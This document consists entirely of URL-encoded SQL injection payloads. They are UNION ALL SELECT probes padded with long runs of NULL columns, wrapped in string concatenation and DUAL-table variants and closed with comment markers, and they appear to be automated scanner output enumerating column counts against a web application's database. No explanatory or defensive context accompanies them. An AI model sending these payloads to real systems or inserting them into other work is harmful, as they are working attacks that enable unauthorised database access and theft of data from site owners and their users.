1%27%20%7C%7C%20%28SELECT%209221%20WHERE%208460%3D8460%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%204582%20WHERE%204724%3D4724%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%202537%20WHERE%208962%3D8962%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%203170%20WHERE%208254%3D8254%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%202545%20WHERE%201088%3D1088%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%209749%20WHERE%207403%3D7403%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%204266%20WHERE%204567%3D4567%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%204857%20WHERE%201755%3D1755%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1%20%2B%20%28SELECT%206468%20FROM%20DUAL%20WHERE%201136%3D1136%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%207922%20FROM%20DUAL%20WHERE%206096%3D6096%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%204664%20FROM%20DUAL%20WHERE%203607%3D3607%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%203701%20FROM%20DUAL%20WHERE%207417%3D7417%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%208204%20FROM%20DUAL%20WHERE%207443%3D7443%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%209137%20FROM%20DUAL%20WHERE%201486%3D1486%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%204865%20FROM%20DUAL%20WHERE%207914%3D7914%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%209331%20FROM%20DUAL%20WHERE%205223%3D5223%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%204835%20FROM%20DUAL%20WHERE%208312%3D8312%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%206539%20FROM%20DUAL%20WHERE%204667%3D4667%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%207802%20WHERE%201811%3D1811%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%204731%20WHERE%206153%3D6153%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%208775%20WHERE%209021%3D9021%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%205082%20WHERE%205822%3D5822%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%204714%20WHERE%206723%3D6723%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%203662%20WHERE%204458%3D4458%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%206902%20WHERE%203116%3D3116%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%205723%20WHERE%202070%3D2070%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%208151%20WHERE%201234%3D1234%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%20%2B%20%28SELECT%209258%20WHERE%205084%3D5084%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1%27%20%2B%20%28SELECT%20%27QFYT%27%20FROM%20DUAL%20WHERE%201213%3D1213%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27ucwm%27%20FROM%20DUAL%20WHERE%201972%3D1972%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27INnh%27%20FROM%20DUAL%20WHERE%205503%3D5503%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27fNnO%27%20FROM%20DUAL%20WHERE%201160%3D1160%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27mcOZ%27%20FROM%20DUAL%20WHERE%205855%3D5855%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27dcBE%27%20FROM%20DUAL%20WHERE%207047%3D7047%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27eDdn%27%20FROM%20DUAL%20WHERE%201005%3D1005%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%2B%20%27 